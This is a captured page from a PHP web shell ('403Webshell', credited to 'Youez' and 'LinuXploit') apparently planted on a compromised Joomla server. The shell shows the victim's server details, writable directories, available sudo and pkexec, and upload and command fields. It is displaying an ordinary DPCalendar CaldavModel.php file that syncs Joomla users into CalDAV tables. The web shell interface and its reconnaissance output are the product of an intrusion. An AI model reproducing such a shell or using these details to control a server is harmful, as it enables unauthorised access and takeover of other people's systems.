403Webshell
Server IP : 172.67.191.97  /  Your IP : 104.23.197.208
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fcs/administrator/components/com_dpcalendar/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/fcs/administrator/components/com_dpcalendar/src/Model/CaldavModel.php
<?php
/**
 * @package   DPCalendar
 * @copyright Copyright (C) 2024 Digital Peak GmbH. <https://www.digital-peak.com>
 * @license   https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
 */

namespace DigitalPeak\Component\DPCalendar\Administrator\Model;

\defined('_JEXEC') or die();

use Joomla\CMS\MVC\Model\BaseDatabaseModel;

class CaldavModel extends BaseDatabaseModel
{
	public function syncUsers(): int
	{
		$db = $this->getDatabase();

		// Sync users
		$db->setQuery('delete from #__dpcalendar_caldav_principals where external_id not in (select id from #__users)');
		$db->execute();
		$db->setQuery(
			'insert into #__dpcalendar_caldav_principals
				(uri, email, displayname, external_id) select concat("principals/", username) as uri, email, name as displayname, id
				from #__users u ON DUPLICATE KEY UPDATE email=u.email, displayname=u.name'
		);
		$db->execute();

		$db->setQuery(
			'insert into #__dpcalendar_caldav_principals
				(uri, email, displayname, external_id) select concat("principals/", username, "/calendar-proxy-read") as uri, email, name as displayname, id
				from #__users u ON DUPLICATE KEY UPDATE email=u.email, displayname=u.name'
		);
		$db->execute();
		$db->setQuery(
			'insert into #__dpcalendar_caldav_principals
				(uri, email, displayname, external_id) select concat("principals/", username, "/calendar-proxy-write") as uri, email, name as displayname, id
				from #__users u ON DUPLICATE KEY UPDATE email=u.email, displayname=u.name'
		);
		$db->execute();

		// Sync calendars
		$db->setQuery(
			'delete p.*, c.*, cal.*, e.* from #__dpcalendar_caldav_principals p
				inner join #__dpcalendar_caldav_calendarinstances c on c.principaluri = p.uri
				inner join #__dpcalendar_caldav_calendars cal on cal.id = c.calendarid
				inner join #__dpcalendar_caldav_calendarobjects e on e.calendarid = c.id
				where p.external_id not in (select id from #__users)'
		);
		$db->execute();

		$db->setQuery('select count(id) from #__users');

		return $db->loadResult() ?: 0;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit